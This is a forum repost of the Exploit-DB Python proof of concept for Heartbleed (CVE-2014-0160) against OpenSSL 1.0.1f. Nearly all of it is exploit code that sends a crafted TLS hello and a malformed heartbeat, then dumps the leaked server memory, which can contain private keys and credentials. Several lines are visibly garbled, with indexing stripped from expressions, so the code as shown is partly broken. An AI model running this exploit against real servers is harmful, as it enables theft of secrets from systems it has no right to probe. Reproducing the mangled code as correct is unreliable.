【转】OpenSSL 1.0.1f TLS Heartbeat Extension
转自http://www.exploit-db.com/exploits/32764/1 # Exploit Title:
2 # Date:
3 # Exploit Author:
4 # Vendor Homepage:
5 # Software Link:
6 # Version:
7 # Tested on:
8 # CVE :
9
10
11 #!/usr/bin/env python
12
13 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
14 # The author disclaims copyright to this source code.
15 # Modified by Csaba Fitzl for multiple SSL / TLS version support
16
17 import sys
18 import struct
19 import socket
20 import time
21 import select
22 import re
23 from optparse import OptionParser
24
25 options = OptionParser(usage='%prog server ', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
26 options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
27
28 def h2bin(x):
29 return x.replace(' ', '').replace('\n', '').decode('hex')
30
31 version = []
32 version.append(['SSL 3.0','03 00'])
33 version.append(['TLS 1.0','03 01'])
34 version.append(['TLS 1.1','03 02'])
35 version.append(['TLS 1.2','03 03'])
36
37 def create_hello(version):
38 hello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53
39 43 5b 90 9d 9b 72 0b bc0c bc 2b 92 a8 48 97 cf
40 bd 39 04 cc 16 0a 85 0390 9f 77 04 33 d4 de 00
41 00 66 c0 14 c0 0a c0 22c0 21 00 39 00 38 00 88
42 00 87 c0 0f c0 05 00 3500 84 c0 12 c0 08 c0 1c
43 c0 1b 00 16 00 13 c0 0dc0 03 00 0a c0 13 c0 09
44 c0 1f c0 1e 00 33 00 3200 9a 00 99 00 45 00 44
45 c0 0e c0 04 00 2f 00 9600 41 c0 11 c0 07 c0 0c
46 c0 02 00 05 00 04 00 1500 12 00 09 00 14 00 11
47 00 08 00 06 00 03 00 ff01 00 00 49 00 0b 00 04
48 03 00 01 02 00 0a 00 3400 32 00 0e 00 0d 00 19
49 00 0b 00 0c 00 18 00 0900 0a 00 16 00 17 00 08
50 00 06 00 07 00 14 00 1500 04 00 05 00 12 00 13
51 00 01 00 02 00 03 00 0f00 10 00 11 00 23 00 00
52 00 0f 00 01 01
53 ''')
54 return hello
55
56 def create_hb(version):
57 hb = h2bin('18 ' + version + ' 00 03 01 40 00')
58 return hb
59
60 def hexdump(s):
61 for b in xrange(0, len(s), 16):
62 lin = ]
63 hxdat = ' '.join('%02X' % ord(c) for c in lin)
64 pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
65 print "%04x: %-48s %s" % (b, hxdat, pdat)
66 print
67
68 def recvall(s, length, timeout=5):
69 endtime = time.time() + timeout
70 rdata = ''
71 remain = length
72 while remain > 0:
73 rtime = endtime - time.time()
74 if rtime < 0:
75 return None
76 r, w, e = select.select(, [], [], 5)
77 if s in r:
78 data = s.recv(remain)
79 # EOF?
80 if not data:
81 return None
82 rdata += data
83 remain -= len(data)
84 return rdata
85
86
87 def recvmsg(s):
88 hdr = recvall(s, 5)
89 if hdr is None:
90 print 'Unexpected EOF receiving record header - server closed connection'
91 return None, None, None
92 typ, ver, ln = struct.unpack('>BHH', hdr)
93 pay = recvall(s, ln, 10)
94 if pay is None:
95 print 'Unexpected EOF receiving record payload - server closed connection'
96 return None, None, None
97 print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
98 return typ, ver, pay
99
100 def hit_hb(s,hb):
101 s.send(hb)
102 while True:
103 typ, ver, pay = recvmsg(s)
104 if typ is None:
105 print 'No heartbeat response received, server likely not vulnerable'
106 return False
107
108 if typ == 24:
109 print 'Received heartbeat response:'
110 hexdump(pay)
111 if len(pay) > 3:
112 print 'WARNING: server returned more data than it should - server is vulnerable!'
113 else:
114 print 'Server processed malformed heartbeat, but did not return any extra data.'
115 return True
116
117 if typ == 21:
118 print 'Received alert:'
119 hexdump(pay)
120 print 'Server returned error, likely not vulnerable'
121 return False
122
123 def main():
124 opts, args = options.parse_args()
125 if len(args) < 1:
126 options.print_help()
127 return
128 for i in range(len(version)):
129 print 'Trying ' + version + '...'
130 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
131 print 'Connecting...'
132 sys.stdout.flush()
133 s.connect((args, opts.port))
134 print 'Sending Client Hello...'
135 sys.stdout.flush()
136 s.send(create_hello(version))
137 print 'Waiting for Server Hello...'
138 sys.stdout.flush()
139 while True:
140 typ, ver, pay = recvmsg(s)
141 if typ == None:
142 print 'Server closed connection without sending Server Hello.'
143 return
144 # Look for server hello done message.
145 if typ == 22 and ord(pay) == 0x0E:
146 break
147
148 print 'Sending heartbeat request...'
149 sys.stdout.flush()
150 s.send(create_hb(version))
151 if hit_hb(s,create_hb(version)):
152 #Stop if vulnerable
153 break
154
155 if __name__ == '__main__':
156 main()
页:
[1]